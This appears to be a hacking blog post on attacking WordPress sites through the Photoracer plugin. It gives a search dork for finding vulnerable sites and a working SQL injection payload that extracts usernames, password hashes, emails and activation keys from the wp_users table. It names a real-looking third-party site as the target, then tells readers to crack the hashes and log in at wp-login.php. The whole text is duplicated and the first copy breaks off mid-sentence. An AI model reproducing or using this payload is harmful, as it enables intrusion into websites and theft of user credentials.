Here is new Way of word press hacking
very simple very Easy
So lets start Guys!!!!!!!
Dork Is
inurl:"wp-content/plugins/photoracer/viewimg.php?id="
see the Result :-
and i'm gonna test 1 of them
http://bzone2.makeeitsolutions.com/designtogive/wp-content/plugins/photoracer/viewimg.php?id=-1
we are going to add the exploit : this is the exploit
wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1%2C2%2C3%2C4%2C5%2Cconcat(0x2d,user_login,0x2d,user_pass,0x2d,user_email,0x3a,user_activation_key)%2C7%2C8%2C9+from+wp_users--
and the site look like this
http://bzone2.makeeitsolutions.com/designtogive/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1%2C2%2C3%2C4%2C5%2Cconcat(0x2d,user_login,0x2d,user_pass,0x2d,user_email,0x3a,user_activation_key)%2C7%2C8%2C9+from+wp_users--
now you can see the user and pass :D ! Just crack the hash and it's done
The admin panel is
very simple very Easy
So lets start Guys!!!!!!!
Dork Is
inurl:"wp-content/plugins/photoracer/viewimg.php?id="
see the Result :-
and i'm gonna test 1 of them
http://bzone2.makeeitsolutions.com/designtogive/wp-content/plugins/photoracer/viewimg.php?id=-1
we are going to add the exploit : this is the exploit
wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1%2C2%2C3%2C4%2C5%2Cconcat(0x2d,user_login,0x2d,user_pass,0x2d,user_email,0x3a,user_activation_key)%2C7%2C8%2C9+from+wp_users--
and the site look like this
http://bzone2.makeeitsolutions.com/designtogive/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1%2C2%2C3%2C4%2C5%2Cconcat(0x2d,user_login,0x2d,user_pass,0x2d,user_email,0x3a,user_activation_key)%2C7%2C8%2C9+from+wp_users--
now you can see the user and pass :D ! Just crack the hash and it's done
The admin panel is
http://Site/wp-login.php
Post a Comment